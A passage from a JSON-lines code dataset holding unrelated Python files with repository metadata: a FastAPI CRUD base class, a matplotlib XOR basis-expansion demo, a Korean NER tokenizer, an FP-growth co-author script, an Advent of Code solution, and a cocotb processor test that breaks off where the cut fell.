db_session.set(db)\n db_obj = self.model(**obj_in.dict(exclude={\"descriptions\"}), created_by_id=user.id)\n descriptions = obj_in.dict()[\"descriptions\"]\n\n if not has_permission(user=user, resource=db_obj, permission=Permission.create):\n raise permission_exception\n\n for description in descriptions:\n db_obj_description = self.model_description(**description)\n db_obj.descriptions.append(db_obj_description)\n\n db.add(db_obj)\n db.commit()\n db.refresh(db_obj)\n return db_obj\n\n def update(self, db: Session, db_obj: Model, obj_in: UpdateSchema, user: User) -> Model:\n \"\"\"Updates the record and the associated descriptions\"\"\"\n db_session.set(db)\n\n if not has_permission(user=user, resource=db_obj, permission=Permission.update):\n raise permission_exception\n\n obj_data = jsonable_encoder(db_obj)\n update_data = obj_in.dict(exclude_unset=True)\n\n for field in update_data:\n if field in obj_data:\n setattr(db_obj, field, update_data[field])\n db_obj.updated_by_id = user.id\n\n if \"descriptions\" in update_data:\n # There are descriptions to be updated\n for item in update_data[\"descriptions\"]:\n db_obj_desc = (\n db.execute(\n select(self.model_description).where(\n and_(\n self.model_description.id == db_obj.id,\n self.model_description.language_code == item[\"language_code\"],\n )\n )\n )\n .scalars()\n .first()\n )\n\n if db_obj_desc:\n # A description for that language already exists and must be updated\n db_obj_desc.description = item[\"description\"]\n db.add(db_obj_desc)\n else:\n # The description in this language does not exist and must be appended\n db_obj_desc = self.model_description(**item)\n db_obj.descriptions.append(db_obj_desc)\n\n db.add(db_obj)\n db.commit()\n db.refresh(db_obj)\n return db_obj\n", "repo_name": "tsharish/presalesly", "sub_path": "backend/app/crud/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 8290, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.TypeVar", "line_number": 20, "usage_type": "call"}, {"api_name": "app.db.base.Base", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.TypeVar", "line_number": 23, "usage_type": "call"}, {"api_name": "app.db.base.Base", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.TypeVar", "line_number": 26, "usage_type": "call"}, {"api_name": "pydantic.BaseModel", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.TypeVar", "line_number": 29, "usage_type": "call"}, {"api_name": "pydantic.BaseModel", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Generic", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 33, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 36, "usage_type": "name"}, {"api_name": "app.models.user.User", "line_number": 36, "usage_type": "name"}, {"api_name": "app.db.session.db_session.set", "line_number": 38, "usage_type": "call"}, {"api_name": "app.db.session.db_session", "line_number": 38, "usage_type": "name"}, {"api_name": "sqlalchemy.select", "line_number": 40, "usage_type": "call"}, {"api_name": "app.core.permissions.has_permission", "line_number": 42, "usage_type": "call"}, {"api_name": "app.core.enums.Permission.read", "line_number": 42, "usage_type": "attribute"}, {"api_name": "app.core.enums.Permission", "line_number": 42, "usage_type": "name"}, {"api_name": "app.core.permissions.permission_exception", "line_number": 43, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 49, "usage_type": "name"}, {"api_name": "app.models.user.User", "line_number": 54, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.expression.Select", "line_number": 55, "usage_type": "name"}, {"api_name": "sqlalchemy.select", "line_number": 59, "usage_type": "call"}, {"api_name": "app.db.filter.apply_filters", "line_number": 62, "usage_type": "call"}, {"api_name": "app.db.sort.apply_sort", "line_number": 65, "usage_type": "call"}, {"api_name": "app.db.paginate.apply_pagination", "line_number": 67, "usage_type": "call"}, {"api_name": "fastapi.HTTPException", "line_number": 70, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 79, "usage_type": "name"}, {"api_name": "app.models.user.User", "line_number": 79, "usage_type": "name"}, {"api_name": "app.db.session.db_session.set", "line_number": 81, "usage_type": "call"}, {"api_name": "app.db.session.db_session", "line_number": 81, "usage_type": "name"}, {"api_name": "app.core.permissions.has_permission", "line_number": 84, "usage_type": "call"}, {"api_name": "app.core.enums.Permission.create", "line_number": 84, "usage_type": "attribute"}, {"api_name": "app.core.enums.Permission", "line_number": 84, "usage_type": "name"}, {"api_name": "app.core.permissions.permission_exception", "line_number": 85, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 92, "usage_type": "name"}, {"api_name": "app.models.user.User", "line_number": 92, "usage_type": "name"}, {"api_name": "app.db.session.db_session.set", "line_number": 94, "usage_type": "call"}, {"api_name": "app.db.session.db_session", "line_number": 94, "usage_type": "name"}, {"api_name": "app.core.permissions.has_permission", "line_number": 96, "usage_type": "call"}, {"api_name": "app.core.enums.Permission.update", "line_number": 96, "usage_type": "attribute"}, {"api_name": "app.core.enums.Permission", "line_number": 96, "usage_type": "name"}, {"api_name": "app.core.permissions.permission_exception", "line_number": 97, "usage_type": "name"}, {"api_name": "fastapi.encoders.jsonable_encoder", "line_number": 99, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 112, "usage_type": "name"}, {"api_name": "app.models.user.User", "line_number": 112, "usage_type": "name"}, {"api_name": "app.db.session.db_session.set", "line_number": 114, "usage_type": "call"}, {"api_name": "app.db.session.db_session", "line_number": 114, "usage_type": "name"}, {"api_name": "app.core.permissions.has_permission", "line_number": 116, "usage_type": "call"}, {"api_name": "app.core.enums.Permission.delete", "line_number": 116, "usage_type": "attribute"}, {"api_name": "app.core.enums.Permission", "line_number": 116, "usage_type": "name"}, {"api_name": "app.core.permissions.permission_exception", "line_number": 117, "usage_type": "name"}, {"api_name": "app.models.user.User", "line_number": 122, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 122, "usage_type": "name"}, {"api_name": "app.db.session.db_schema.get", "line_number": 124, "usage_type": "call"}, {"api_name": "app.db.session.db_schema", "line_number": 124, "usage_type": "name"}, {"api_name": "app.db.session.engine.raw_connection", "line_number": 127, "usage_type": "call"}, {"api_name": "app.db.session.engine", "line_number": 127, "usage_type": "name"}, {"api_name": "typing.Generic", "line_number": 151, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 153, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 157, "usage_type": "name"}, {"api_name": "app.models.user.User", "line_number": 157, "usage_type": "name"}, {"api_name": "app.db.session.db_session.set", "line_number": 159, "usage_type": "call"}, {"api_name": "app.db.session.db_session", "line_number": 159, "usage_type": "name"}, {"api_name": "app.core.permissions.has_permission", "line_number": 163, "usage_type": "call"}, {"api_name": "app.core.enums.Permission.create", "line_number": 163, "usage_type": "attribute"}, {"api_name": "app.core.enums.Permission", "line_number": 163, "usage_type": "name"}, {"api_name": "app.core.permissions.permission_exception", "line_number": 164, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 175, "usage_type": "name"}, {"api_name": "app.models.user.User", "line_number": 175, "usage_type": "name"}, {"api_name": "app.db.session.db_session.set", "line_number": 177, "usage_type": "call"}, {"api_name": "app.db.session.db_session", "line_number": 177, "usage_type": "name"}, {"api_name": "app.core.permissions.has_permission", "line_number": 179, "usage_type": "call"}, {"api_name": "app.core.enums.Permission.update", "line_number": 179, "usage_type": "attribute"}, {"api_name": "app.core.enums.Permission", "line_number": 179, "usage_type": "name"}, {"api_name": "app.core.permissions.permission_exception", "line_number": 180, "usage_type": "name"}, {"api_name": "fastapi.encoders.jsonable_encoder", "line_number": 182, "usage_type": "call"}, {"api_name": "sqlalchemy.select", "line_number": 195, "usage_type": "call"}, {"api_name": "sqlalchemy.and_", "line_number": 196, "usage_type": "call"}]} +{"seq_id": "40146561882", "text": "\"\"\" DSFM Illustration: Basis expansion\n -------------------------------------------------------------------------------------------------\n \n Creator: Data Science for Managers - EPFL Program - https://www.dsfm.ch\n Source: https://github.com/dsfm-org/code-bank.git\n License: MIT License (https://opensource.org/licenses/MIT) - see LICENSE in Code Bank repository. \n \n OVERVIEW:\n \n The following module executes the same illustration as the basis-expansion notebook, \n but allows for interactive rotation of the graphs.\n\n\"\"\"\n\n# Import all packages \n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport matplotlib\nfrom mpl_toolkits.mplot3d import axes3d\n\n# Special code to ignore un-important warnings \nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# In[2]:\n\n\n# define all constant\nSTD = 0.30\nN = 100\nFIGSIZE = (10, 10)\nFONTSIZE = 16\nPLOT_X1_LABEL = '\\nNo A Yes A'\nPLOT_X2_LABEL = '\\nNo B Yes B'\nLOCATION = 1\nPLOT_MIN = -2.0\nPLOT_MAX = 2.0\nPLOT_ALPHA = 0.3\nPLOT_CMAP = cm.winter\nPLOT_LINES = 0\nPLOT_HIDE_GRID = False\n\n\n# ## **Part 1**: Basis function expansion and SVM to solve XOR problem\n# \n# This demo shows how a Support Vector Machine (SVM) can use a non-linear basis function expansion to warp the feature space in order to get it into a better shape for cutting it with a hyper-plane.\n# \n# This demo does NOT show how a SVM actually uses it's optimization procedure to find the maximal cutting hyperplane (because the data is already evenly and symmetrically separated around the orgin, we can simply put the plane at the origin.\n# \n# Note: 3D-rendering only works in Python scripts.\n\n# In[3]:\n\n\n# Generate data -------------------------------------------------------------------------------\nx1_Yes_A = np.random.normal(loc= LOCATION, scale=STD, size=N)\nx2_Yes_A = np.random.normal(loc= -1 * LOCATION, scale=STD, size=N)\nx1_Yes_B = np.random.normal(loc= -1 * LOCATION, scale=STD, size=N)\nx2_Yes_B = np.random.normal(loc= LOCATION, scale=STD, size=N)\nx1_No_A = np.random.normal(loc= -1 * LOCATION, scale=STD, size=N)\nx2_No_A = np.random.normal(loc= -1 * LOCATION, scale=STD, size=N)\nx1_No_B = np.random.normal(loc= -1 * LOCATION, scale=STD, size=N)\nx2_No_B = np.random.normal(loc= -1 * LOCATION, scale=STD, size=N)\n\n\n# Plot the data in 2-D ------------------------------------------------------------------------\nfig = plt.figure(1, figsize=FIGSIZE)\nax = fig.add_subplot(111)\n\nax.set_title('Fuzzy XOR Data in 2 Dimensions\\n', fontsize = FONTSIZE)\nax.tick_params(axis='both', which='major', labelsize=FONTSIZE)\nax.set_xlabel(PLOT_X1_LABEL, fontsize = FONTSIZE)\nax.set_ylabel(PLOT_X2_LABEL, fontsize = FONTSIZE)\nplt.hlines(0, xmin = min(x1_No_A), xmax = max(x1_Yes_A), colors='black', linewidth=1)\nplt.vlines(0, ymin = min(x2_No_B), ymax = max(x2_Yes_B), colors='black', linewidth=1)\nplt.plot(x1_No_A, x2_No_A, c='red', marker='x', linestyle='None', markersize=10)\nplt.plot(x1_Yes_A, x2_Yes_B, c='red', marker='x', linestyle='None', markersize=10)\nplt.plot(x1_Yes_A, x2_Yes_A, c='green', marker='o', linestyle='None', markersize=10)\nplt.plot(x1_Yes_B, x2_Yes_B, c='green', marker='o', linestyle='None', markersize=10)\nplt.show()\n\n\n# In[4]:\n\n\n# Plot a hyperbolic surface to show a workable transformation ---------------------------------\n\nx = np.arange(PLOT_MIN, PLOT_MAX, 0.05)\ny = np.arange(PLOT_MIN, PLOT_MAX, 0.05)\nx, y = np.meshgrid(x, y)\nsurface_hyperbolic = -(x * y)\nfig = plt.figure(2, figsize=FIGSIZE)\nax = fig.add_subplot(111, projection='3d')\nax.tick_params(axis='both', which='major', labelsize=FONTSIZE)\nax.set_title('Hyperbolic Transformation\\n', fontsize=FONTSIZE)\nax.plot_surface(x, y, surface_hyperbolic, cmap=PLOT_CMAP, alpha=PLOT_ALPHA, linewidth=PLOT_LINES, antialiased=PLOT_HIDE_GRID)\nax.contour(x, y, surface_hyperbolic, cmap=PLOT_CMAP, )\nplt.show()\n\n\n# In[5]:\n\n\n# Plot other surfaces (that do NOT work but are interesting) ------------------------------------\n\n# /////// Quadratic surface\nsurface_quadratic = x ** 2 * y ** 2\nfig = plt.figure(3, figsize=FIGSIZE)\nax = fig.add_subplot(111, projection='3d')\nax.tick_params(axis='both', which='major', labelsize=FONTSIZE)\nax.set_title('Quadratic Transformation\\n', fontsize=FONTSIZE)\nax.plot_surface(x, y, surface_quadratic, cmap=PLOT_CMAP, alpha=PLOT_ALPHA, linewidth=PLOT_LINES, antialiased=PLOT_HIDE_GRID)\nax.contour(x, y, surface_quadratic, cmap=PLOT_CMAP)\nax.axis([PLOT_MIN, PLOT_MAX, PLOT_MIN, PLOT_MAX])\nax.set_zlim([0.0, 4.0 * LOCATION])\nplt.show()\n\n\n# In[6]:\n\n\n# /////// Mexican-hat surface\nsurface_mexican = np.cos((x ** 2 + y ** 2) ** .5) ** 2\nfig = plt.figure(4, figsize=FIGSIZE)\nax = fig.add_subplot(111, projection='3d')\nax.tick_params(axis='both', which='major', labelsize=FONTSIZE)\nax.set_title('Mexican-Hat Transformation\\n', fontsize=FONTSIZE)\nax.plot_surface(x, y, surface_mexican, cmap=PLOT_CMAP, alpha=PLOT_ALPHA, linewidth=PLOT_LINES, antialiased=PLOT_HIDE_GRID)\nax.contour(x, y, surface_mexican, cmap=PLOT_CMAP)\nax.axis([PLOT_MIN, PLOT_MAX, PLOT_MIN, PLOT_MAX])\nax.set_zlim([0.0, 1.0 * LOCATION])\nplt.show()\n\n\n# In[7]:\n\n\n# /////// Egg-carton surface\nsurface_eggs = np.cos(2 * x) * np.sin(3 * y)\nfig = plt.figure(5, figsize=FIGSIZE)\nax = fig.add_subplot(111, projection='3d')\nax.tick_params(axis='both', which='major', labelsize=FONTSIZE)\nax.set_title('Peak Transformation\\n', fontsize=FONTSIZE)\nax.plot_surface(x, y, surface_eggs, cmap=PLOT_CMAP, alpha=PLOT_ALPHA, linewidth=PLOT_LINES, antialiased=PLOT_HIDE_GRID)\nax.contour(x, y, surface_eggs, cmap=PLOT_CMAP)\nax.axis([PLOT_MIN, PLOT_MAX, PLOT_MIN, PLOT_MAX])\nax.set_zlim([-LOCATION, LOCATION])\nplt.show()\n\n\n# In[8]:\n\n\n# Project data onto hyperbolic surface -------------------------------------------------------\ny_success_by_a = -(x1_Yes_A * x2_No_B)\ny_success_by_b = -(x1_No_A * x2_Yes_B)\ny_failure_by_inaction = -(x1_No_A * x2_No_A)\ny_failure_by_conflict = -(x1_Yes_A * x2_Yes_B)\n\n\n# Plot projected data in 3-D -----------------------------------------------------------------\nfig = plt.figure(6, figsize=FIGSIZE)\nax = fig.add_subplot(111, projection='3d')\nax.tick_params(axis='both', which='major', labelsize=FONTSIZE)\nax.set_xlabel(PLOT_X1_LABEL, fontsize = FONTSIZE)\nax.set_ylabel(PLOT_X2_LABEL, fontsize = FONTSIZE)\nax.axis([PLOT_MIN, PLOT_MAX, PLOT_MIN, PLOT_MAX])\nax.set_zlim([PLOT_MIN, PLOT_MAX])\nax.plot_surface(x, y, surface_hyperbolic, cmap=PLOT_CMAP, alpha=PLOT_ALPHA, linewidth=PLOT_LINES, antialiased=PLOT_HIDE_GRID)\nax.contour(x, y, surface_hyperbolic, cmap=PLOT_CMAP, )\nax.scatter(x1_No_A, x2_No_B, y_failure_by_inaction, c='red', marker='x', linestyle='None')\nax.scatter(x1_Yes_A, x2_Yes_B, y_failure_by_conflict, c='red', marker='x', linestyle='None')\nax.scatter(x1_Yes_A, x2_No_B, y_success_by_a, c='green', marker='o', linestyle='None')\nax.scatter(x1_No_A, x2_Yes_B, y_success_by_b, c='green', marker='o', linestyle='None')\nplt.show()\n\n\n# In[9]:\n\n\n# Plot 3-D solution (data + a splitting plane) ------------------------------------------------\ncutting_plane = 0.0 * x\nfig = plt.figure(7, figsize=FIGSIZE)\nax = fig.add_subplot(111, projection='3d')\nax.tick_params(axis='both', which='major', labelsize=FONTSIZE)\nax.set_xlabel(PLOT_X1_LABEL, fontsize = FONTSIZE)\nax.set_ylabel(PLOT_X2_LABEL, fontsize = FONTSIZE)\nax.axis([PLOT_MIN, PLOT_MAX, PLOT_MIN, PLOT_MAX])\nax.set_zlim([PLOT_MIN, PLOT_MAX])\nax.plot_surface(x, y, surface_hyperbolic, cmap=PLOT_CMAP, alpha=PLOT_ALPHA, linewidth=PLOT_LINES, antialiased=PLOT_HIDE_GRID)\nax.contour(x, y, surface_hyperbolic, cmap=PLOT_CMAP, )\nax.scatter(x1_No_A, x2_No_A, -(x1_No_A * x2_No_A), c='red', marker='x', linestyle='None')\nax.scatter(x1_Yes_A, x2_Yes_B, -(x1_Yes_A * x2_Yes_B), c='red', marker='x', linestyle='None')\nax.scatter(x1_Yes_A, x2_No_B, -(x1_Yes_A * x2_No_B), c='green', marker='o', linestyle='None')\nax.scatter(x1_No_A, x2_Yes_B, -(x1_No_A * x2_Yes_B), c='green', marker='o', linestyle='None')\nax.plot_surface(x, y, cutting_plane, alpha=PLOT_ALPHA, linewidth=PLOT_LINES, antialiased=PLOT_HIDE_GRID)\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "jbesomi/code-bank", "sub_path": "illustrations/basis-expansion/basis-expansion.py", "file_name": "basis-expansion.py", "file_ext": "py", "file_size_in_byte": 8238, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.cm.winter", "line_number": 42, "usage_type": "attribute"}, {"api_name": "matplotlib.cm", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.random.normal", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 66, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.vlines", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "numpy.cos", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "numpy.cos", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}]} +{"seq_id": "7278573700", "text": "from dataclasses import dataclass\nfrom . import KoBertTokenizer\n\n@dataclass\nclass NerTokenizerFactories:\n BERT_TOKENIZER: KoBertTokenizer\n\nclass NerTokenizer:\n def __init__(self, tokenizer_name=None):\n self.tokenizer_name = tokenizer_name\n\n if tokenizer_name == \"BERT\":\n self.tokenizer = KoBertTokenizer.from_pretrained(\"monologg/kobert\")\n \n def tokenize(self, sentence):\n return self.tokenizer.tokenize(sentence)\n\n def convert_tokens_to_ids(self, tokens):\n return self.tokenizer.convert_tokens_to_ids(tokens)\n\n def get_pad_token(self):\n return self.tokenizer.pad_token\n\n def get_pad_token_id(self):\n return self.tokenizer.pad_token_id\n\n def __call__(self, sentence, chars):\n token_list = self.tokenize(sentence)\n label_list = []\n\n for token in token_list:\n if token.startswith(\"▁\"):\n token = token[1:]\n\n label = \"\"\n is_single_token = False\n is_begin_token = False\n is_inside_token = False\n is_end_token = False\n\n while token:\n token = token[1:]\n\n while True:\n char = chars[0]\n del chars[0]\n\n if char[\"char\"] != \" \":\n break\n\n l = char[\"label\"]\n\n if l != \"O\":\n label = l[2:]\n\n if l.startswith(\"S-\"):\n is_single_token = True\n elif l.startswith(\"B-\"):\n is_begin_token = True\n elif l.startswith(\"I-\"):\n is_inside_token = True\n elif l.startswith(\"E-\"):\n is_end_token = True\n\n if (is_begin_token and is_end_token) or is_single_token:\n label_list.append(\"S-\" + label)\n elif is_end_token:\n label_list.append(\"E-\" + label)\n elif is_begin_token:\n label_list.append(\"B-\" + label)\n elif is_inside_token:\n label_list.append(\"I-\" + label)\n else:\n label_list.append(\"O\")\n\n return token_list, label_list", "repo_name": "chnaaam/korean-named-entity-recognition", "sub_path": "KoNER/tokenizer/ner_tokenizer.py", "file_name": "ner_tokenizer.py", "file_ext": "py", "file_size_in_byte": 2219, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "dataclasses.dataclass", "line_number": 4, "usage_type": "name"}]} +{"seq_id": "38814242542", "text": "\"\"\"\r\n在找到各自的研究者群体后,我们希望找到经常性在一起合作的\r\n学者,将之称为‘团队’。请你根据研究者合作发表论文次数为根据\r\n进行频繁模式挖掘,找出三个人以上的‘团队’。\r\n\"\"\"\r\n\r\nimport codecs\r\nfrom pyfpgrowth import find_frequent_patterns\r\nfrom utils import load_author_list\r\n\r\n\r\ndef find_team(data, freq=5, file_path='./data/author_list/team'):\r\n \"\"\"\r\n find team according to the freq with fp-growth algorithm\r\n \"\"\"\r\n teams = find_frequent_patterns(data, freq)\r\n with codecs.open(file_path, 'w', encoding='utf8') as f:\r\n for team in teams:\r\n # team size should be greater than 3\r\n if len(team) >= 3:\r\n f.write(','.join(team) + '\\n')\r\n\r\n\r\nif __name__ == '__main__':\r\n data = load_author_list()\r\n find_team(data)\r\n", "repo_name": "Sara-HY/FrequentPattern", "sub_path": "team.py", "file_name": "team.py", "file_ext": "py", "file_size_in_byte": 858, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pyfpgrowth.find_frequent_patterns", "line_number": 16, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 17, "usage_type": "call"}, {"api_name": "utils.load_author_list", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "29758080644", "text": "import csv\nimport numpy as np\nfrom functools import reduce\npos = np.array([0,0])\nmovement = {\"forward\": np.array([1,0]), \"down\": np.array([0,1]), \"up\": np.array([0,-1])}\na = []\nwith open(\"2.txt\") as file:\n reader = csv.reader(file,delimiter=\" \")\n for row in reader:\n a.append(row)\n \np1 = reduce(lambda x, y: x+y, [movement[m]*int(d) for m, d in a])\nprint(np.prod(p1))", "repo_name": "georgeoshardo/AOC_2021", "sub_path": "2.py", "file_name": "2.py", "file_ext": "py", "file_size_in_byte": 387, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.array", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 5, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 8, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.prod", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "71442573284", "text": "import random\nimport warnings\n\nimport cocotb\nfrom cocotb.clock import Clock\nfrom cocotb.triggers import FallingEdge\nfrom cocotb.triggers import RisingEdge\nfrom cocotb.triggers import Edge\nfrom cocotb.triggers import Timer\nfrom cocotb.binary import BinaryValue\n#from cocotb.regression import TestFactory\n\n# NOP = MOV R5, #0\n\"\"\"\nMOV R3, #0x3C ;initial memory address for length and elements\nMOV R0, #0 ;number zero\nMOV R2, #0 ;keeps sum\nLDR R1, [R3] ;read from memory location 0x3A, keeps number of elements\nNOP \nNOP \nL1: CMP R1, R0\n NOP //kalkacak\n NOP //kalkacak\nBEQ store\nNOP \nNOP \nNOP \nNOP \nADD R3, #4\nSUB R1, #1\nNOP \nLDR R4, [R3]\nNOP \nNOP \nADDS R2, R2, R4\nB L1\nNOP \nNOP \nNOP \nNOP \nstore: STR R2, [R3, #4] ;R2 gives array sum \nNOP \nNOP \nNOP\nNOP\ndone: B done\n\"\"\"\n\n\"\"\"\n3C30A0E3\n0000A0E3\n0020A0E3\n001093E5\n0050A0E3\n0050A0E3\n000051E1\n0F00000A\n0050A0E3\n0050A0E3\n0050A0E3\n0050A0E3\n043083E2\n011041E2\n0050A0E3\n004093E5\n0050A0E3\n0050A0E3\n042092E0\nF1FFFFEA\n0050A0E3\n0050A0E3\n0050A0E3\n0050A0E3\n042083E5\n0050A0E3\n0050A0E3\nFEFFFFEA\n\"\"\"\n\n\n\n@cocotb.test()\nasync def arrays_sum_test(dut):\n #start the clock\n await cocotb.start(Clock(dut.clk, 10, 'us').start(start_high=False))\n #set clkedge as the FallingEdge for triggers\n clkedge = RisingEdge(dut.clk)\n negclkedge = FallingEdge(dut.clk)\n await clkedge\n # reset PC and RegFile\n dut.rst.value = 1\n await clkedge\n await clkedge\n dut.rst.value = 0\n assert dut.PC_out.value == 0\n assert dut.Inst.value == 0\n #await clkedge\n # starts operation #######################################################\n await clkedge\n # fetch MOV R3, #0x3C\n #assert dut.Inst.value == 0\n assert dut.PC_out.value == 0\n await clkedge\n # decode MOV R3, #0x3C, fetch MOV R0, #0 \n print(\"dut.Inst.value\",hex(dut.Inst.value))\n assert dut.PC_out.value == 4\n await clkedge\n # Execute MOV R3, #0x3C, decode MOV R0, #0, fetch MOV R2, #0\n print(\"dut.Inst.value\",hex(dut.Inst.value))\n await clkedge\n # memory MOV R3, #0x3C, execute MOV R0, #0, decode MOV R2, #0, fetch LDR R1, [R3]\n await clkedge\n # writeback MOV R3, #0x3C, memory MOV R0, #0, execute MOV R2, #0, decode LDR R1, [R3], fetch NOP\n assert dut.ALUOutW.value == 0x3C\n assert dut.REGWr.value == 1 \n r3 = 0x3c\n await clkedge\n # writebak MOV R0, #0, memory MOV R2, #0, execute LDR R1, [R3], decode NOP, fetch NOP\n assert dut.ALUOutW.value == 0\n assert dut.REGWr.value == 1 \n assert dut.RD1.value == 0x3C\n print(\"Random check flags \", dut.Flags.value)\n r0 = 0\n \"\"\"\n await clkedge\n # writeback MOV R2, #0, memory LDR R1, [R3], execute NOP, decode NOP, fetch CMP R1, R0\n assert dut.ALUOutW.value == 0\n assert dut.REGWr.value == 1 \n await clkedge\n # writeback LDR R1, [R3], memory NOP, execute NOP, decode CMP R1, R0, fetch NOP\n assert dut.REGWr.value == 1\n r1 = 3\n assert dut.ALUOutW.value == 0x3c\n assert dut.ReadDataW.value == r1\n \"\"\"\n r1 = 3\n r2 = 0\n \n \n for i in range(r1):\n print(\"Cycle \", i)\n await 